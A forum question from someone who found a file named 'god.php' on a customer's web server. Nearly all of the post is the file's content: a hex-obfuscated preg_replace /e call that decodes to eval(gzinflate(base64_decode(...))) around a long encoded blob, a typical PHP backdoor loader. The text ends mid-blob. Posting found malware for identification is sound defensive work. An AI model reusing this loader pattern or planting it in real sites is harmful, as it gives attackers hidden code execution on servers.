# Strange PHP file found on web server

Tags: php

I've found a very strange PHP file with a very long regexp in a customer web server. The file is named 'god.php', and this is their content:

```
<?php

preg_replace("/.*/e", "\x28\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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